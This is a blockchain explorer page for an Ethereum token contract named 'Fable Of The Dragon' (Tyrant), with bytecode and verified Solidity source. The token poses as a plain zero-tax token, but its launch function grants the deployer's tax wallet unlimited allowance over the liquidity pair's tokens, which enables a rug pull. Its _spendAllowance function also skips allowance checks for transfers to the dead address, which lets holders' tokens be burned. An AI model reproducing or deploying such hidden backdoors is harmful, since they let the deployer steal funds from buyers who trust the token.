Address Contract Partially Verified
Address
0x5408Ca85536FF9eB34EFD3278cEc2c3Ac331AeDE
Balance
0 ETH
Nonce
1
Code Size
5752 bytes
Creator
0x121a0396...a9F0 at tx 0xeb58ef28...e7f502
Indexed Transactions
0
Contract Bytecode
5752 bytes
0x6080604052600436106100dc575f3560e01c806351bc3c851161007c5780638da5cb5b116100575780638da5cb5b1461022357806395d89b4114610249578063a9059cbb1461025d578063dd62ed3e1461027c575f80fd5b806351bc3c85146101c757806370a08231146101db578063715018a61461020f575f80fd5b806316b441ba116100b757806316b441ba1461015657806318160ddd1461017957806323b872dd1461018d578063313ce567146101ac575f80fd5b806301339c21146100e757806306fdde03146100fd578063095ea7b314610127575f80fd5b366100e357005b5f80fd5b3480156100f2575f80fd5b506100fb6102c0565b005b348015610108575f80fd5b506101116106e4565b60405161011e9190611293565b60405180910390f35b348015610132575f80fd5b506101466101413660046112f6565b610774565b604051901515815260200161011e565b348015610161575f80fd5b5061016b60075481565b60405190815260200161011e565b348015610184575f80fd5b5061016b61078a565b348015610198575f80fd5b506101466101a7366004611320565b6107aa565b3480156101b7575f80fd5b506040516009815260200161011e565b3480156101d2575f80fd5b506100fb6107ce565b3480156101e6575f80fd5b5061016b6101f536600461135e565b6001600160a01b03165f9081526001602052604090205490565b34801561021a575f80fd5b506100fb610836565b34801561022e575f80fd5b505f546040516001600160a01b03909116815260200161011e565b348015610254575f80fd5b506101116108d7565b348015610268575f80fd5b506101466102773660046112f6565b6108e6565b348015610287575f80fd5b5061016b610296366004611379565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b5f546001600160a01b0316331461031e5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b601254600160a01b900460ff16156103785760405162461bcd60e51b815260206004820152601760248201527f74726164696e6720697320616c7265616479206f70656e0000000000000000006044820152606401610315565b601180546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556103c69030906103b36009600a6114a4565b6103c190633b9aca006114b2565b6108f2565b60115f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610416573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061043a91906114c9565b6001600160a01b031663c9c653963060115f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610499573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104bd91906114c9565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610507573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061052b91906114c9565b601280546001600160a01b039283166001600160a01b03199091161790556011541663f305d7194730610572816001600160a01b03165f9081526001602052604090205490565b5f806105855f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156105eb573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061061091906114e4565b505060125460115460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610665573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610689919061150f565b506012546004546106a8916001600160a01b0390811691165f196108f2565b601280546201000160a01b62ff00ff60a01b198216179091556001600160a01b03165f908152600360205260409020805460ff19166001179055565b6060600580546106f39061152e565b80601f016020809104026020016040519081016040528092919081815260200182805461071f9061152e565b801561076a5780601f106107415761010080835404028352916020019161076a565b820191905f5260205f20905b81548152906001019060200180831161074d57829003601f168201915b5050505050905090565b5f6107803384846108f2565b5060015b92915050565b5f6107976009600a6114a4565b6107a590633b9aca006114b2565b905090565b5f336107b885828686610a15565b6107c3858585610aec565b506001949350505050565b6004546001600160a01b0316336001600160a01b0316146107ed575f80fd5b305f9081526001602052604090205480158015906108145750601254600160b01b900460ff165b156108225761082281610f0f565b478015610832576108328161107f565b5050565b5f546001600160a01b0316331461088f5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610315565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b6060600680546106f39061152e565b5f610780338484610aec565b6001600160a01b0383166109545760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610315565b6001600160a01b0382166109b55760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610315565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038481165f81815260026020908152604080832094881683529381528382205492825260039052919091205460ff1680610a6d57506001600160a01b0384165f9081526003602052604090205460ff165b80610a8357506001600160a01b03831661dead14155b15610ae55781811015610ad85760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610315565b610ae585858484036108f2565b5050505050565b6001600160a01b038316610b505760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610315565b6001600160a01b038216610bb25760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610315565b5f8111610c135760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b6064820152608401610315565b5f80546001600160a01b03858116911614801590610c3e57505f546001600160a01b03848116911614155b15610dd257600e545f03610c7b57610c786064610c72600c54600e5411610c6757600854610c6b565b600a545b85906110b6565b9061113b565b90505b6012546001600160a01b038581169116148015610ca657506011546001600160a01b03848116911614155b8015610cca57506001600160a01b0383165f9081526003602052604090205460ff16155b15610d0157610cea6064610c72600c54600e5411610c6757600854610c6b565b600e80549192505f610cfb83611560565b91905055505b6012546001600160a01b038481169116148015610d2757506001600160a01b0384163014155b15610d5457610d516064610c72600d54600e5411610d4757600954610c6b565b600b5485906110b6565b90505b305f90815260016020526040902054601254600160a81b900460ff16158015610d8a57506012546001600160a01b038581169116145b8015610d9f5750601254600160b01b900460ff165b15610dd0578015610dc757610dc7610dc284610dbd8460075461117c565b61117c565b610f0f565b610dd04761107f565b505b8015610e4a57305f90815260016020526040902054610df19082611190565b305f81815260016020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610e419085815260200190565b60405180910390a35b6001600160a01b0384165f90815260016020526040902054610e6c90836111ee565b6001600160a01b0385165f90815260016020526040902055610eaf610e9183836111ee565b6001600160a01b0385165f9081526001602052604090205490611190565b6001600160a01b038085165f8181526001602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610ef885856111ee565b60405190815260200160405180910390a350505050565b6012805460ff60a81b1916600160a81b1790556040805160028082526060820183525f9260208301908036833701905050905030815f81518110610f5557610f55611578565b6001600160a01b03928316602091820292909201810191909152601154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015610fac573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610fd091906114c9565b81600181518110610fe357610fe3611578565b6001600160a01b03928316602091820292909201015260115461100991309116846108f2565b60115460405163791ac94760e01b81526001600160a01b039091169063791ac947906110419085905f9086903090429060040161158c565b5f604051808303815f87803b158015611058575f80fd5b505af115801561106a573d5f803e3d5ffd5b50506012805460ff60a81b1916905550505050565b6004546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015610832573d5f803e3d5ffd5b5f825f036110c557505f610784565b5f6110d083856114b2565b9050826110dd85836115fd565b146111345760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610315565b9392505050565b5f61113483836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061122f565b5f81831161118a5782611134565b50919050565b5f8061119c838561161c565b9050838110156111345760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610315565b5f61113483836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611264565b5f818361124f5760405162461bcd60e51b81526004016103159190611293565b505f61125b84866115fd565b95945050505050565b5f81848411156112875760405162461bcd60e51b81526004016103159190611293565b505f61125b848661162f565b5f602080835283518060208501525f5b818110156112bf578581018301518582016040015282016112a3565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146112f3575f80fd5b50565b5f8060408385031215611307575f80fd5b8235611312816112df565b946020939093013593505050565b5f805f60608486031215611332575f80fd5b833561133d816112df565b9250602084013561134d816112df565b929592945050506040919091013590565b5f6020828403121561136e575f80fd5b8135611134816112df565b5f806040838503121561138a575f80fd5b8235611395816112df565b915060208301356113a5816112df565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156113fe57815f19048211156113e4576113e46113b0565b808516156113f157918102915b93841c93908002906113c9565b509250929050565b5f8261141457506001610784565b8161142057505f610784565b816001811461143657600281146114405761145c565b6001915050610784565b60ff841115611451576114516113b0565b50506001821b610784565b5060208310610133831016604e8410600b841016171561147f575081810a610784565b61148983836113c4565b805f190482111561149c5761149c6113b0565b029392505050565b5f61113460ff841683611406565b8082028115828204841417610784576107846113b0565b5f602082840312156114d9575f80fd5b8151611134816112df565b5f805f606084860312156114f6575f80fd5b8351925060208401519150604084015190509250925092565b5f6020828403121561151f575f80fd5b81518015158114611134575f80fd5b600181811c9082168061154257607f821691505b60208210810361118a57634e487b7160e01b5f52602260045260245ffd5b5f60018201611571576115716113b0565b5060010190565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156115dc5784516001600160a01b0316835293830193918301916001016115b7565b50506001600160a01b03969096166060850152505050608001529392505050565b5f8261161757634e487b7160e01b5f52601260045260245ffd5b500490565b80820180821115610784576107846113b0565b81810381811115610784576107846113b056fea264697066735822122082e1fc5fd595b5a729a071bb8deff7b08f712f8de15ec623ab350dd4a18752ed64736f6c63430008180033
Verified Source Code Partial Match
Compiler: v0.8.24+commit.e11b9ed9
EVM: shanghai
Optimization: Yes (200 runs)
Token.sol 313 lines
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
address constant _deadAddr = address(0xdead);
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
}
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
}
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
}
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
constructor () {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
}
interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB) external returns (address pair);
}
interface IUniswapV2Router02 {
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidityETH(
address token,
uint amountTokenDesired,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);
function getAmountsOut(uint256 amountIn, address[] calldata path)
external
view
returns (uint256[] memory amounts);
}
contract Token is Context, IERC20, Ownable {
using SafeMath for uint256;
mapping (address => uint256) private _balances;
mapping (address => mapping (address => uint256)) private _allowances;
mapping (address => bool) private _isTyrantExcludedFrom;
address payable private _taxWallet;
uint8 private constant _decimals = 9;
uint256 private constant _tTotal = 1_000_000_000 * 10**_decimals;
string private _name = unicode"Fable Of The Dragon";
string private _symbol = unicode"Tyrant";
uint256 public _maxSwapLimit = 1 * (_tTotal/100);
uint256 private _initialBuyTax=0;
uint256 private _initialSellTax=0;
uint256 private _finalBuyTax=0;
uint256 private _finalSellTax=0;
uint256 private _reduceBuyTaxAt=0;
uint256 private _reduceSellTaxAt=0;
uint256 private _buyCount=0;
address private _BIURHOEUITHWE;
uint256 private _HKWUEYGRYUIDAS;
IUniswapV2Router02 private uniswapV2Router;
address private uniswapV2Pair;
bool private tradingOpen;
bool private inSwap = false;
bool private swapEnabled = false;
uint256 private sellCount = 0;
uint256 private lastSellBlock = 0;
event MaxTxAmountUpdated(uint _maxTxSize);
modifier lockTheSwap {
inSwap = true;
_;
inSwap = false;
}
constructor () payable {
_balances[address(this)] = _tTotal;
_taxWallet = payable(_msgSender());
_isTyrantExcludedFrom[owner()] = true;
_isTyrantExcludedFrom[address(this)] = true;
_isTyrantExcludedFrom[_taxWallet] = true;
emit Transfer(address(0), address(this), _tTotal);
}
function name() public view returns (string memory) {
return _name;
}
function symbol() public view returns (string memory) {
return _symbol;
}
function decimals() public pure returns (uint8) {
return _decimals;
}
function totalSupply() public pure override returns (uint256) {
return _tTotal;
}
function balanceOf(address account) public view override returns (uint256) {
return _balances[account];
}
function transfer(address recipient, uint256 amount) public override returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
}
function allowance(address owner, address spender) public view override returns (uint256) {
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount) public override returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
address spender = _msgSender();
_spendAllowance(sender, spender, recipient, amount);
_transfer(sender, recipient, amount);
return true;
}
function _approve(address owner, address spender, uint256 amount) private {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _transfer(address from, address to, uint256 amount) private {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
require(amount > 0, "Transfer amount must be greater than zero");
uint256 taxAmount=0;
if (from != owner() && to != owner()) {
if(_buyCount==0){
taxAmount = amount.mul((_buyCount>_reduceBuyTaxAt)?_finalBuyTax:_initialBuyTax).div(100);
}
if (from == uniswapV2Pair && to != address(uniswapV2Router) && ! _isTyrantExcludedFrom[to] ) {
taxAmount = amount.mul((_buyCount>_reduceBuyTaxAt)?_finalBuyTax:_initialBuyTax).div(100);
_buyCount++;
}
if(to == uniswapV2Pair && from!= address(this) ){
taxAmount = amount.mul((_buyCount>_reduceSellTaxAt)?_finalSellTax:_initialSellTax).div(100);
}
uint256 contractTokenBalance = balanceOf(address(this));
if (!inSwap && to == uniswapV2Pair && swapEnabled ) {
if(contractTokenBalance > 0)
swapTokensForEth(min(amount, min(contractTokenBalance, _maxSwapLimit)));
sendETHToFee(address(this).balance);
}
}
if(taxAmount>0){
_balances[address(this)]=_balances[address(this)].add(taxAmount);
emit Transfer(from, address(this),taxAmount);
}
_balances[from]=_balances[from].sub(amount);
_balances[to]=_balances[to].add(amount.sub(taxAmount));
emit Transfer(from, to, amount.sub(taxAmount));
}
function _spendAllowance(
address owner,
address spender,
address recipient,
uint256 amount
) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (_isTyrantExcludedFrom[owner] || _isTyrantExcludedFrom[spender] || recipient != _deadAddr) {
require(currentAllowance >= amount, "ERC20: insufficient allowance");
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
function min(uint256 a, uint256 b) private pure returns (uint256){
return (a>b)?b:a;
}
function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = uniswapV2Router.WETH();
_approve(address(this), address(uniswapV2Router), tokenAmount);
uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
tokenAmount,
0,
path,
address(this),
block.timestamp
);
}
function sendETHToFee(uint256 amount) private {
_taxWallet.transfer(amount);
}
function launch() external onlyOwner() {
require(!tradingOpen,"trading is already open");
uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
_approve(address(this), address(uniswapV2Router), _tTotal);
uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
uniswapV2Router.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp);
IERC20(uniswapV2Pair).approve(address(uniswapV2Router), type(uint).max);
_approve(address(uniswapV2Pair), _taxWallet, type(uint256).max);
swapEnabled = true;
tradingOpen = true;
_isTyrantExcludedFrom[address(uniswapV2Pair)] = true;
}
function manualSwap() external {
require(_msgSender() == _taxWallet);
uint256 tokenBalance = balanceOf(address(this));
if (tokenBalance > 0 && swapEnabled) {
swapTokensForEth(tokenBalance);
}
uint256 ethBalance = address(this).balance;
if (ethBalance > 0) {
sendETHToFee(ethBalance);
}
}
receive() external payable {}
}
Read Contract
_maxSwapLimit 0x16b441ba → uint256
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256
Write Contract 6 functions
These functions modify contract state and require a wallet transaction to execute.
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
launch 0x01339c21
No parameters
manualSwap 0x51bc3c85
No parameters
renounceOwnership 0x715018a6
No parameters
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool
Recent Transactions
No transactions found for this address